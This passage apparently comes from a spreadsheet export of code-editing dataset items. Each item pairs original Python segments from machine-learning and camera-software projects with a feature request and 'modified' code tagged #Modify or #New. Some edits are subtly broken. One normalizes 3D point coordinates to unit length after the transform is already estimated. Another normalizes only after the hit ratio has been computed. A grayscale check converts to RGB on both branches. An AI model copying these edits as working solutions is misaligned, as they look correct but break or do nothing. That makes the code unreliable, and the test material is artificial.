self.BLOCK_NORM_TYPE\n    CHANNELS = self.CHANNELS\n    TR_CHANNELS = self.TR_CHANNELS\n    self.normalize_feature = normalize_feature\n    self.conv1 = ME.MinkowskiConvolution(\n        in_channels=in_channels,\n        out_channels=CHANNELS[1],\n        kernel_size=conv1_kernel_size,\n        stride=1,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm1 = get_norm(NORM_TYPE, CHANNELS[1], bn_momentum=bn_momentum, D=D)\n\n    #Modify: Pass normalize_feature to get_block\n    self.block1 = get_block(\n        BLOCK_NORM_TYPE, CHANNELS[1], CHANNELS[1], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv2 = ME.MinkowskiConvolution(\n        in_channels=CHANNELS[1],\n        out_channels=CHANNELS[2],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm2 = get_norm(NORM_TYPE, CHANNELS[2], bn_momentum=bn_momentum, D=D)\n\n    self.block2 = get_block(\n        BLOCK_NORM_TYPE, CHANNELS[2], CHANNELS[2], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv3 = ME.MinkowskiConvolution(\n        in_channels=CHANNELS[2],\n        out_channels=CHANNELS[3],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm3 = get_norm(NORM_TYPE, CHANNELS[3], bn_momentum=bn_momentum, D=D)\n\n    self.block3 = get_block(\n        BLOCK_NORM_TYPE, CHANNELS[3], CHANNELS[3], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv4 = ME.MinkowskiConvolution(\n        in_channels=CHANNELS[3],\n        out_channels=CHANNELS[4],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm4 = get_norm(NORM_TYPE, CHANNELS[4], bn_momentum=bn_momentum, D=D)\n\n    self.block4 = get_block(\n        BLOCK_NORM_TYPE, CHANNELS[4], CHANNELS[4], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv4_tr = ME.MinkowskiConvolutionTranspose(\n        in_channels=CHANNELS[4],\n        out_channels=TR_CHANNELS[4],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm4_tr = get_norm(NORM_TYPE, TR_CHANNELS[4], bn_momentum=bn_momentum, D=D)\n\n    self.block4_tr = get_block(\n        BLOCK_NORM_TYPE, TR_CHANNELS[4], TR_CHANNELS[4], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv3_tr = ME.MinkowskiConvolutionTranspose(\n        in_channels=CHANNELS[3] + TR_CHANNELS[4],\n        out_channels=TR_CHANNELS[3],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm3_tr = get_norm(NORM_TYPE, TR_CHANNELS[3], bn_momentum=bn_momentum, D=D)\n\n    self.block3_tr = get_block(\n        BLOCK_NORM_TYPE, TR_CHANNELS[3], TR_CHANNELS[3], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv2_tr = ME.MinkowskiConvolutionTranspose(\n        in_channels=CHANNELS[2] + TR_CHANNELS[3],\n        out_channels=TR_CHANNELS[2],\n        kernel_size=3,\n        stride=2,\n        dilation=1,\n        bias=False,\n        dimension=D)\n    self.norm2_tr = get_norm(NORM_TYPE, TR_CHANNELS[2], bn_momentum=bn_momentum, D=D)\n\n    self.block2_tr = get_block(\n        BLOCK_NORM_TYPE, TR_CHANNELS[2], TR_CHANNELS[2], bn_momentum=bn_momentum, normalize_feature=normalize_feature, D=D)\n\n    self.conv1_tr = ME.MinkowskiConvolution(\n        in_channels=CHANNELS[1] + TR_CHANNELS[2],\n        out_channels=TR_CHANNELS[1],\n        kernel_size=1,\n        stride=1,\n        dilation=1,\n        bias=False,\n        dimension=D)\n\n    self.final = ME.MinkowskiConvolution(\n        in_channels=TR_CHANNELS[1],\n        out_channels=out_channels,\n        kernel_size=1,\n        stride=1,\n        dilation=1,\n        bias=True,\n        dimension=D)\n\n  def forward(self, x):\n    out_s1 = self.conv1(x)\n    out_s1 = self.norm1(out_s1)\n    out_s1 = self.block1(out_s1)\n    out = MEF.relu(out_s1)\n\n    out_s2 = self.conv2(out)\n    out_s2 = self.norm2(out_s2)\n    out_s2 = self.block2(out_s2)\n    out = MEF.relu(out_s2)\n\n    out_s4 = self.conv3(out)\n    out_s4 = self.norm3(out_s4)\n    out_s4 = self.block3(out_s4)\n    out = MEF.relu(out_s4)\n\n    out_s8 = self.conv4(out)\n    out_s8 = self.norm4(out_s8)\n    out_s8 = self.block4(out_s8)\n    out = MEF.relu(out_s8)\n\n    out = self.conv4_tr(out)\n    out = self.norm4_tr(out)\n    out = self.block4_tr(out)\n    out_s4_tr = MEF.relu(out)\n\n    out = ME.cat(out_s4_tr, out_s4)\n\n    out = self.conv3_tr(out)\n    out = self.norm3_tr(out)\n    out = self.block3_tr(out)\n    out_s2_tr = MEF.relu(out)\n\n    out = ME.cat(out_s2_tr, out_s2)\n\n    out = self.conv2_tr(out)\n    out = self.norm2_tr(out)\n    out = self.block2_tr(out)\n    out_s1_tr = MEF.relu(out)\n\n    out = ME.cat(out_s1_tr, out_s1)\n    out = self.conv1_tr(out)\n    out = MEF.relu(out)\n    out = self.final(out)\n\n    if self.normalize_feature:\n      return ME.SparseTensor(\n          out.F / torch.norm(out.F, p=2, dim=1, keepdim=True),\n          coordinate_map_key=out.coordinate_map_key,\n          coordinate_manager=out.coordinate_manager)\n    else:\n      return out"}</t>
  </si>
  <si>
    <t>{'#file 1': 'def forward(self, x):\n    out_s1 = self.conv1(x)\n    out_s1 = self.norm1(out_s1)\n    out_s1 = self.block1(out_s1)\n    out = MEF.relu(out_s1)\n\n    out_s2 = self.conv2(out)\n    out_s2 = self.norm2(out_s2)\n    out_s2 = self.block2(out_s2)\n    out = MEF.relu(out_s2)\n\n    out_s4 = self.conv3(out)\n    out_s4 = self.norm3(out_s4)\n    out_s4 = self.block3(out_s4)\n    out = MEF.relu(out_s4)\n\n    out_s8 = self.conv4(out)\n    out_s8 = self.norm4(out_s8)\n    out_s8 = self.block4(out_s8)\n    out = MEF.relu(out_s8)\n\n    out = self.conv4_tr(out)\n    out = self.norm4_tr(out)\n    out = self.block4_tr(out)\n    out_s4_tr = MEF.relu(out)\n\n    out = ME.cat(out_s4_tr, out_s4)\n\n    out = self.conv3_tr(out)\n    out = self.norm3_tr(out)\n    out = self.block3_tr(out)\n    out_s2_tr = MEF.relu(out)\n\n    out = ME.cat(out_s2_tr, out_s2)\n\n    out = self.conv2_tr(out)\n    out = self.norm2_tr(out)\n    out = self.block2_tr(out)\n    out_s1_tr = MEF.relu(out)\n\n    out = ME.cat(out_s1_tr, out_s1)\n    out = self.conv1_tr(out)\n    out = MEF.relu(out)\n    out = self.final(out)\n\n    #Modify: Added optional normalization step\n    if self.normalize_feature:\n      return ME.SparseTensor(\n          out.F / torch.norm(out.F, p=2, dim=1, keepdim=True),\n          coordinate_map_key=out.coordinate_map_key,\n          coordinate_manager=out.coordinate_manager)\n    else:\n      return out', '#file 2': "sinput0 = ME.SparseTensor(\n    input_dict['sinput0_F'].to(self.device),\n    coordinates=input_dict['sinput0_C'].to(self.device))\nF0 = self.model(sinput0).F\n\nsinput1 = ME.SparseTensor(\n    input_dict['sinput1_F'].to(self.device),\n    coordinates=input_dict['sinput1_C'].to(self.device))\nF1 = self.model(sinput1).F\n\n#Modify: Ensure normalization is handled correctly\nif self.model.normalize_feature:\n    F0 = F0 / torch.norm(F0, p=2, dim=1, keepdim=True)\n    F1 = F1 / torch.norm(F1, p=2, dim=1, keepdim=True)", '#file 3': 'xyz0_corr, xyz1_corr = self.find_corr(xyz0, xyz1, F0, F1, subsample_size=5000)\nT_est = te.est_quad_linear_robust(xyz0_corr, xyz1_corr)\n\n#Modify: Update correlation finding to handle normalized features\nif self.model.normalize_feature:\n    xyz0_corr = xyz0_corr / torch.norm(xyz0_corr, p=2, dim=1, keepdim=True)\n    xyz1_corr = xyz1_corr / torch.norm(xyz1_corr, p=2, dim=1, keepdim=True)', '#file 4': 'hit_ratio = self.evaluate_hit_ratio(\n    xyz0_corr, xyz1_corr, T_gth, thresh=self.config.hit_ratio_thresh)\nhit_ratio_meter.update(hit_ratio)\n\n#Modify: Update hit ratio evaluation to handle normalized features\nif self.model.normalize_feature:\n    xyz0_corr = xyz0_corr / torch.norm(xyz0_corr, p=2, dim=1, keepdim=True)\n    xyz1_corr = xyz1_corr / torch.norm(xyz1_corr, p=2, dim=1, keepdim=True)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_train_hooks(name_list, use_tpu=False, **kwargs):\n  """Factory for getting a list of TensorFlow hooks for training by name.\n  ...\n  """\n  if not name_list:\n    return []\n  if use_tpu:\n    tf.logging.warning(...)\n    return []\n  train_hooks = []\n  for name in name_list:\n    hook_name = HOOKS.get(name.strip().lower())\n    if hook_name is None:\n      raise ValueError(\'Unrecognized training hook requested: {}\'.format(name))\n    else:\n      train_hooks.append(hook_name(**kwargs))\n  return train_hooks', 'invoking_code_segment': 'train_hooks = hooks_helper.get_train_hooks(\n    flags_obj.hooks,\n    model_dir=flags_obj.model_dir,\n    batch_size=flags_obj.batch_size)', 'feature_description': 'Add support for mixed precision training in the ResNet model by introducing a new MixedPrecisionHook that monitors and logs mixed precision training metrics, and integrating it into the hooks helper factory to allow users to enable mixed precision training through command-line flags.', 'modified_complete_code': '# File 1: ml-on-gcp/example_zoo/tensorflow/models/mnist/official/utils/logs/hooks_helper.py\n\n# ... existing imports ...\nimport tensorflow as tf\nfrom official.utils.logs import hooks\nfrom official.utils.logs import logger\nfrom official.utils.logs import metric_hook\n\n_TENSORS_TO_LOG = dict((x, x) for x in [\'learning_rate\',\n                                        \'cross_entropy\',\n                                        \'train_accuracy\'])\n\n# #New - Add mixed precision tensors to log\n_MIXED_PRECISION_TENSORS_TO_LOG = dict((x, x) for x in [\'learning_rate\',\n                                                         \'cross_entropy\',\n                                                         \'train_accuracy\',\n                                                         \'loss_scale\'])\n\n# #New - MixedPrecisionHook class for monitoring mixed precision training\nclass MixedPrecisionHook(tf.train.SessionRunHook):\n  """Hook for logging mixed precision training metrics."""\n  \n  def __init__(self, loss_scale=1.0, every_n_iter=100):\n    """Initialize MixedPrecisionHook.\n    \n    Args:\n      loss_scale: The loss scale factor used in mixed precision training.\n      every_n_iter: Log metrics every N iterations.\n    """\n    self.loss_scale = loss_scale\n    self.every_n_iter = every_n_iter\n    self._iter_count = 0\n  \n  def begin(self):\n    """Called when new TensorFlow session is created."""\n    self._iter_count = 0\n  \n  def before_run(self, run_context):\n    """Called before each run."""\n    self._iter_count += 1\n    if self._iter_count % self.every_n_iter == 0:\n      tf.logging.info(\'Mixed precision training - Loss scale: %f\', self.loss_scale)\n    return tf.train.SessionRunArgs([])\n\ndef get_train_hooks(name_list, use_tpu=False, **kwargs):\n  """Factory for getting a list of TensorFlow hooks for training by name.\n\n  Args:\n    name_list: a list of strings to name desired hook classes. Allowed:\n      LoggingTensorHook, ProfilerHook, ExamplesPerSecondHook, MixedPrecisionHook,\n      which are defined as keys in HOOKS\n    use_tpu: Boolean of whether computation occurs on a TPU. This will disable\n      hooks altogether.\n    **kwargs: a dictionary of arguments to the hooks.\n\n  Returns:\n    list of instantiated hooks, ready to be used in a classifier.train call.\n\n  Raises:\n    ValueError: if an unrecognized name is passed.\n  """\n\n  if not name_list:\n    return []\n\n  if use_tpu:\n    tf.logging.warning("hooks_helper received name_list `{}`, but a TPU is "\n                       "specified. No hooks will be used.".format(name_list))\n    return []\n\n  train_hooks = []\n  for name in name_list:\n    hook_name = HOOKS.get(name.strip().lower())\n    if hook_name is None:\n      raise ValueError(\'Unrecognized training hook requested: {}\'.format(name))\n    else:\n      train_hooks.append(hook_name(**kwargs))\n\n  return train_hooks\n\n# #Modify - Updated to use mixed precision tensors when loss_scale is provided\ndef get_logging_tensor_hook(every_n_iter=100, tensors_to_log=None, loss_scale=1, **kwargs):\n  """Function to get LoggingTensorHook.\n\n  Args:\n    every_n_iter: `int`, print the values of `tensors` once every N local\n      steps taken on the current worker.\n    tensors_to_log: List of tensor names or dictionary mapping labels to tensor\n      names. If not set, log _TENSORS_TO_LOG by default.\n    loss_scale: `float`, loss scale factor for mixed precision training.\n    **kwargs: a dictionary of arguments to LoggingTensorHook.\n\n  Returns:\n    Returns a LoggingTensorHook with a standard set of tensors that will be\n    printed to stdout.\n  """\n  if tensors_to_log is None:\n    # #Modify - Use mixed precision tensors if loss_scale &gt; 1\n    if loss_scale &gt; 1:\n      tensors_to_log = _MIXED_PRECISION_TENSORS_TO_LOG\n    else:\n      tensors_to_log = _TENSORS_TO_LOG\n\n  return tf.train.LoggingTensorHook(\n      tensors=tensors_to_log,\n      every_n_iter=every_n_iter)\n\ndef get_profiler_hook(model_dir, save_steps=1000, **kwargs):\n  """Function to get ProfilerHook.\n\n  Args:\n    model_dir: The directory to save the profile traces to.\n    save_steps: `int`, print profile traces every N steps.\n    **kwargs: a dictionary of arguments to ProfilerHook.\n\n  Returns:\n    Returns a ProfilerHook that writes out timelines that can be loaded into\n    profiling tools like chrome://tracing.\n  """\n  return tf.train.ProfilerHook(save_steps=save_steps, output_dir=model_dir)\n\ndef get_examples_per_second_hook(every_n_steps=100,\n                                 batch_size=128,\n                                 warm_steps=5,\n                                 **kwargs):\n  """Function to get ExamplesPerSecondHook.\n\n  Args:\n    every_n_steps: `int`, print current and average examples per second every\n      N steps.\n    batch_size: `int`, total batch size used to calculate examples/second from\n      global time.\n    warm_steps: skip this number of steps before logging and running average.\n    **kwargs: a dictionary of arguments to ExamplesPerSecondHook.\n\n  Returns:\n    Returns a ProfilerHook that writes out timelines that can be loaded into\n    profiling tools like chrome://tracing.\n  """\n  return hooks.ExamplesPerSecondHook(\n      batch_size=batch_size, every_n_steps=every_n_steps,\n      warm_steps=warm_steps, metric_logger=logger.get_benchmark_logger())\n\ndef get_logging_metric_hook(tensors_to_log=None,\n                            every_n_secs=600,\n                            **kwargs):\n  """Function to get LoggingMetricHook.\n\n  Args:\n    tensors_to_log: List of tensor names or dictionary mapping labels to tensor\n      names. If not set, log _TENSORS_TO_LOG by default.\n    every_n_secs: `int`, the frequency for logging the metric. Default to every\n      10 mins.\n\n  Returns:\n    Returns a LoggingMetricHook that saves tensor values in a JSON format.\n  """\n  if tensors_to_log is None:\n    tensors_to_log = _TENSORS_TO_LOG\n  return metric_hook.LoggingMetricHook(\n      tensors=tensors_to_log,\n      metric_logger=logger.get_benchmark_logger(),\n      every_n_secs=every_n_secs)\n\n# #New - Function to get MixedPrecisionHook\ndef get_mixed_precision_hook(loss_scale=1.0, every_n_iter=100, **kwargs):\n  """Function to get MixedPrecisionHook.\n  \n  Args:\n    loss_scale: `float`, the loss scale factor for mixed precision training.\n    every_n_iter: `int`, log metrics every N iterations.\n    **kwargs: a dictionary of arguments to MixedPrecisionHook.\n  \n  Returns:\n    Returns a MixedPrecisionHook for monitoring mixed precision training.\n  """\n  return MixedPrecisionHook(loss_scale=loss_scale, every_n_iter=every_n_iter)\n\n# #Modify - Updated HOOKS dictionary to include MixedPrecisionHook\nHOOKS = {\n    \'loggingtensorhook\': get_logging_tensor_hook,\n    \'profilerhook\': get_profiler_hook,\n    \'examplespersecondhook\': get_examples_per_second_hook,\n    \'loggingmetrichook\': get_logging_metric_hook,\n    \'mixedprecisionhook\': get_mixed_precision_hook,\n}\n\n# File 2: ml-on-gcp/example_zoo/tensorflow/models/keras_imagenet_main/official/resnet/resnet_run_loop.py\n# ... existing code ...\n\n# #Modify - Updated resnet_model_fn to support mixed precision training\ndef resnet_model_fn(features, labels, mode, model_class,\n                    resnet_size, weight_decay, learning_rate_fn, momentum,\n                    data_format, resnet_version, loss_scale,\n                    loss_filter_fn=None, dtype=resnet_model.DEFAULT_DTYPE,\n                    fine_tune=False, enable_mixed_precision=False):\n  """Shared functionality for different resnet model_fns with mixed precision support.\n  \n  Args:\n    enable_mixed_precision: `bool`, whether to enable mixed precision training.\n    ... (other args remain the same)\n  """\n  # ... existing code ...\n  \n  if mode == tf.estimator.ModeKeys.TRAIN:\n    global_step = tf.train.get_or_create_global_step()\n    learning_rate = learning_rate_fn(global_step)\n    tf.identity(learning_rate, name=\'learning_rate\')\n    tf.summary.scalar(\'learning_rate\', learning_rate)\n    \n    # #New - Log loss scale for mixed precision training\n    if enable_mixed_precision and loss_scale &gt; 1:\n      tf.identity(tf.constant(loss_scale, dtype=tf.float32), name=\'loss_scale\')\n      tf.summary.scalar(\'loss_scale\', tf.constant(loss_scale, dtype=tf.float32))\n    \n    optimizer = tf.train.MomentumOptimizer(\n        learning_rate=learning_rate,\n        momentum=momentum\n    )\n    \n    # ... rest of training code ...\n\n# #Modify - Updated resnet_main to pass mixed precision flag to hooks\ndef resnet_main(\n    flags_obj, model_function, input_function, dataset_name, shape=None):\n  """Shared main loop for ResNet Models with mixed precision support."""\n  \n  # ... existing code ...\n  \n  # #Modify - Pass loss_scale to hooks for mixed precision monitoring\n  train_hooks = hooks_helper.get_train_hooks(\n      flags_obj.hooks,\n      model_dir=flags_obj.model_dir,\n      batch_size=flags_obj.batch_size,\n      loss_scale=flags_core.get_loss_scale(flags_obj))\n  \n  # ... rest of function ...\n\n# #New - Add mixed precision flag definition\ndef define_resnet_flags(resnet_size_choices=None):\n  """Add flags and validators for ResNet."""\n  flags_core.define_base()\n  flags_core.define_performance(num_parallel_calls=False,\n                                tf_gpu_thread_mode=True,\n                                datasets_num_private_threads=True,\n                                datasets_num_parallel_batches=True)\n  flags_core.define_image()\n  flags_core.define_benchmark()\n  flags.adopt_module_key_flags(flags_core)\n  \n  # ... existing flag definitions ...\n  \n  # #New - Add mixed precision training flag\n  flags.DEFINE_boolean(\n      name=\'enable_mixed_precision\', default=False,\n      help=flags_core.help_wrap(\n          \'If True enable mixed precision training with automatic loss scaling.\'))'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def parse_record(raw_record, is_training, dtype):\n  record_vector = tf.decode_raw(raw_record, tf.uint8)\n  label = tf.cast(record_vector[0], tf.int32)\n  depth_major = tf.reshape(record_vector[1:_RECORD_BYTES], [NUM_CHANNELS, HEIGHT, WIDTH])\n  image = tf.cast(tf.transpose(depth_major, [1, 2, 0]), tf.float32)\n  image = preprocess_image(image, is_training)\n  #Modify: Cast image to dtype specified\n  image = tf.cast(image, dtype)\n  return image, label', '#file 2': "def input_fn(is_training, data_dir, batch_size, num_epochs=1, dtype=tf.float32, datasets_num_private_threads=None, num_parallel_batches=1, parse_record_fn=parse_record):\n  filenames = get_filenames(is_training, data_dir)\n  dataset = tf.data.FixedLengthRecordDataset(filenames, _RECORD_BYTES)\n  return resnet_run_loop.process_record_dataset(\n      dataset=dataset,\n      is_training=is_training,\n      batch_size=batch_size,\n      shuffle_buffer=NUM_IMAGES['train'],\n      parse_record_fn=parse_record_fn,\n      num_epochs=num_epochs,\n      dtype=dtype,\n      datasets_num_private_threads=datasets_num_private_threads,\n      num_parallel_batches=num_parallel_batches\n  )", '#file 3': 'def run(flags_obj):\n  dtype = flags_core.get_tf_dtype(flags_obj)\n  if flags_obj.use_synthetic_data:\n    input_fn = keras_common.get_synth_input_fn(\n        height=cifar_main.HEIGHT,\n        width=cifar_main.WIDTH,\n        num_channels=cifar_main.NUM_CHANNELS,\n        num_classes=cifar_main.NUM_CLASSES,\n        dtype=dtype)\n  else:\n    input_fn = cifar_main.input_fn\n  train_input_dataset = input_fn(\n      is_training=True,\n      data_dir=flags_obj.data_dir,\n      batch_size=flags_obj.batch_size,\n      num_epochs=flags_obj.train_epochs,\n      dtype=dtype,\n      parse_record_fn=parse_record_keras)\n  eval_input_dataset = input_fn(\n      is_training=False,\n      data_dir=flags_obj.data_dir,\n      batch_size=flags_obj.batch_size,\n      num_epochs=flags_obj.train_epochs,\n      dtype=dtype,\n      parse_record_fn=parse_record_keras)', '#file 4': 'def main(_):\n  with logger.benchmark_context(flags.FLAGS):\n    run(flags.FLAGS)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def pil_loader(path):\n    with open(path, 'rb') as f:\n        img = Image.open(f)\n        return img.convert('RGB')", 'invoking_code_segment': "def default_loader(path):\n    from torchvision import get_image_backend\n    if get_image_backend() == 'accimage':\n        return accimage_loader(path)\n    else:\n        return pil_loader(path)", 'feature_description': 'Add a new feature to allow the image loader to handle grayscale images by converting them to RGB. This enhancement ensures that grayscale images are automatically converted to RGB format during loading, maintaining consistency across the dataset regardless of the input image format.', 'modified_complete_code': '# deep-generative-prior/dataset.py\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom PIL import Image\n\nimport utils\n\n\ndef pil_loader(path):\n    # open path as file to avoid ResourceWarning\n    # (https://github.com/python-pillow/Pillow/issues/835)\n    with open(path, \'rb\') as f:\n        img = Image.open(f)\n        # #Modify: Handle grayscale images by converting to RGB\n        if img.mode in (\'L\', \'LA\', \'P\'):\n            img = img.convert(\'RGB\')\n        else:\n            img = img.convert(\'RGB\')\n        return img\n\n\ndef accimage_loader(path):\n    import accimage\n    try:\n        return accimage.Image(path)\n    except IOError:\n        # Potentially a decoding problem, fall back to PIL.Image\n        return pil_loader(path)\n\n\ndef default_loader(path):\n    from torchvision import get_image_backend\n    if get_image_backend() == \'accimage\':\n        return accimage_loader(path)\n    else:\n        return pil_loader(path)\n\n\nclass ImageDataset(data.Dataset):\n\n    def __init__(self,\n                 root_dir,\n                 meta_file,\n                 transform=None,\n                 image_size=128,\n                 normalize=True):\n        self.root_dir = root_dir\n        if transform is not None:\n            self.transform = transform\n        else:\n            norm_mean = [0.5, 0.5, 0.5]\n            norm_std = [0.5, 0.5, 0.5]\n            if normalize:\n                self.transform = transforms.Compose([\n                    utils.CenterCropLongEdge(),\n                    transforms.Resize(image_size),\n                    transforms.ToTensor(),\n                    transforms.Normalize(norm_mean, norm_std)\n                ])\n            else:\n                self.transform = transforms.Compose([\n                    utils.CenterCropLongEdge(),\n                    transforms.Resize(image_size),\n                    transforms.ToTensor()\n                ])\n        with open(meta_file) as f:\n            lines = f.readlines()\n        print("building dataset from %s" % meta_file)\n        self.num = len(lines)\n        self.metas = []\n        self.classifier = None\n        for line in lines:\n            line_split = line.rstrip().split()\n            if len(line_split) == 2:\n                self.metas.append((line_split[0], int(line_split[1])))\n            else:\n                self.metas.append((line_split[0], -1))\n        print("read meta done")\n\n    def __len__(self):\n        return self.num\n\n    def __getitem__(self, idx):\n        filename = self.root_dir + \'/\' + self.metas[idx][0]\n        cls = self.metas[idx][1]\n        img = default_loader(filename)\n\n        # transform\n        if self.transform is not None:\n            img = self.transform(img)\n\n        return img, cls, self.metas[idx][0]'}</t>
  </si>
  <si>
    <t>{'#file 1': "def pil_loader(path):\n    with open(path, 'rb') as f:\n        img = Image.open(f)\n        if img.mode == 'L':  # Modify: Check if image is grayscale\n            img = img.convert('RGB')  # Modify: Convert to RGB\n        return img.convert('RGB')", '#file 2': "def __getitem__(self, idx):\n    filename = self.root_dir + '/' + self.metas[idx][0]\n    cls = self.metas[idx][1]\n    img = default_loader(filename)", '#file 3': 'img = get_img(img_path, resolution)', '#file 4': 'img = get_img(img_path, resolution)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def get_camera(camera_id, as_lines=False):\n    if not as_lines and camera_id in _camera_config_cache:\n        return _camera_config_cache[camera_id]\n\n    camera_config_path = os.path.join(settings.CONF_PATH, _CAMERA_CONFIG_FILE_NAME) % {\n        'id': camera_id\n    }\n\n    logging.debug(f'reading camera config from {camera_config_path}...')\n\n    try:\n        f = open(camera_config_path)\n\n    except Exception as e:\n        logging.error(f'could not open camera config file: {str(e)}')\n\n        raise\n\n    try:\n        lines = [line.strip() for line in f.readlines()]\n\n    except Exception as e:\n        logging.error(f'could not read camera config file {camera_config_path}: {e}')\n\n        raise\n\n    finally:\n        f.close()\n\n    if as_lines:\n        return lines\n\n    camera_config = _conf_to_dict(\n        lines,\n        no_convert=[\n            '@network_share_name',\n            '@network_smb_ver',\n            '@network_server',\n            '@network_username',\n            '@network_password',\n            '@storage_device',\n            '@upload_server',\n            '@upload_username',\n            '@upload_password',\n            '@upload_endpoint_url',\n            '@upload_access_key',\n            '@upload_secret_key',\n            '@upload_bucket',\n            'camera_name',\n        ],\n    )\n\n    if utils.is_local_motion_camera(camera_config):\n        # determine the enabled status\n        main_config = get_main()\n        cameras = main_config.get('camera', [])\n        camera_config['@enabled'] = (\n            _CAMERA_CONFIG_FILE_NAME % {'id': camera_id} in cameras\n        )\n        camera_config['@id'] = camera_id\n\n        # adapt directives for motion versions &lt; 4.2 and &gt; 4.3\n        adapt_config_directives(camera_config, _MOTION_41_TO_43_OPTIONS_MAPPING)\n        adapt_config_directives(camera_config, _MOTION_44_TO_43_OPTIONS_MAPPING)\n\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_motion_camera(camera_id, camera_config)\n\n    elif utils.is_remote_camera(camera_config):\n        pass\n\n    elif utils.is_simple_mjpeg_camera(camera_config):\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_simple_mjpeg_camera(camera_id, camera_config)\n\n    else:  # incomplete configuration\n        logging.warning(\n            f'camera config file at {camera_config_path} is incomplete, ignoring'\n        )\n\n        return None\n\n    _camera_config_cache[camera_id] = dict(camera_config)\n\n    return camera_config", 'invoking_code_segment': "def post(self):\n        event = self.get_argument('event')\n        motion_camera_id = int(self.get_argument('motion_camera_id'))\n\n        camera_id = motionctl.motion_camera_id_to_camera_id(motion_camera_id)\n        if camera_id is None:\n            logging.debug(\n                'ignoring event for unknown motion camera id %s' % motion_camera_id\n            )\n            return self.finish_json()\n\n        else:\n            logging.debug(\n                'received relayed event {event} for motion camera id {id} (camera id {cid})'.format(\n                    event=event, id=motion_camera_id, cid=camera_id\n                )\n            )\n\n        camera_config = config.get_camera(camera_id)", 'feature_description': 'Add a feature to log the camera configuration details when a camera is fetched. This includes logging the camera name, enabled status, storage device, and other key configuration parameters to help with debugging and monitoring camera configurations.', 'modified_complete_code': '# File 1: motioneye/motioneye/config.py - Modified get_camera function\n\ndef get_camera(camera_id, as_lines=False):\n    if not as_lines and camera_id in _camera_config_cache:\n        return _camera_config_cache[camera_id]\n\n    camera_config_path = os.path.join(settings.CONF_PATH, _CAMERA_CONFIG_FILE_NAME) % {\n        \'id\': camera_id\n    }\n\n    logging.debug(f\'reading camera config from {camera_config_path}...\')\n\n    try:\n        f = open(camera_config_path)\n\n    except Exception as e:\n        logging.error(f\'could not open camera config file: {str(e)}\')\n\n        raise\n\n    try:\n        lines = [line.strip() for line in f.readlines()]\n\n    except Exception as e:\n        logging.error(f\'could not read camera config file {camera_config_path}: {e}\')\n\n        raise\n\n    finally:\n        f.close()\n\n    if as_lines:\n        return lines\n\n    camera_config = _conf_to_dict(\n        lines,\n        no_convert=[\n            \'@network_share_name\',\n            \'@network_smb_ver\',\n            \'@network_server\',\n            \'@network_username\',\n            \'@network_password\',\n            \'@storage_device\',\n            \'@upload_server\',\n            \'@upload_username\',\n            \'@upload_password\',\n            \'@upload_endpoint_url\',\n            \'@upload_access_key\',\n            \'@upload_secret_key\',\n            \'@upload_bucket\',\n            \'camera_name\',\n        ],\n    )\n\n    if utils.is_local_motion_camera(camera_config):\n        # determine the enabled status\n        main_config = get_main()\n        cameras = main_config.get(\'camera\', [])\n        camera_config[\'@enabled\'] = (\n            _CAMERA_CONFIG_FILE_NAME % {\'id\': camera_id} in cameras\n        )\n        camera_config[\'@id\'] = camera_id\n\n        # adapt directives for motion versions &lt; 4.2 and &gt; 4.3\n        adapt_config_directives(camera_config, _MOTION_41_TO_43_OPTIONS_MAPPING)\n        adapt_config_directives(camera_config, _MOTION_44_TO_43_OPTIONS_MAPPING)\n\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_motion_camera(camera_id, camera_config)\n\n    elif utils.is_remote_camera(camera_config):\n        pass\n\n    elif utils.is_simple_mjpeg_camera(camera_config):\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_simple_mjpeg_camera(camera_id, camera_config)\n\n    else:  # incomplete configuration\n        logging.warning(\n            f\'camera config file at {camera_config_path} is incomplete, ignoring\'\n        )\n\n        return None\n\n    _camera_config_cache[camera_id] = dict(camera_config)\n\n    #New - Log camera configuration details\n    _log_camera_config_details(camera_id, camera_config)\n\n    return camera_config\n\n\n#New - Add helper function to log camera configuration details\ndef _log_camera_config_details(camera_id, camera_config):\n    """Log camera configuration details for debugging and monitoring purposes."""\n    try:\n        camera_name = camera_config.get(\'camera_name\', \'Unknown\')\n        enabled = camera_config.get(\'@enabled\', False)\n        storage_device = camera_config.get(\'@storage_device\', \'Unknown\')\n        proto = \'unknown\'\n        \n        if utils.is_local_motion_camera(camera_config):\n            proto = \'v4l2\' if utils.is_v4l2_camera(camera_config) else (\'mmal\' if utils.is_mmal_camera(camera_config) else \'netcam\')\n            width = camera_config.get(\'width\', \'N/A\')\n            height = camera_config.get(\'height\', \'N/A\')\n            framerate = camera_config.get(\'framerate\', \'N/A\')\n            motion_detection = camera_config.get(\'@motion_detection\', False)\n            \n            logging.info(\n                f\'Camera {camera_id} configuration loaded: name={camera_name}, enabled={enabled}, \'\n                f\'proto={proto}, resolution={width}x{height}, framerate={framerate}, \'\n                f\'motion_detection={motion_detection}, storage_device={storage_device}\'\n            )\n        elif utils.is_remote_camera(camera_config):\n            proto = \'remote\'\n            logging.info(\n                f\'Camera {camera_id} configuration loaded: name={camera_name}, enabled={enabled}, \'\n                f\'proto={proto}, storage_device={storage_device}\'\n            )\n        elif 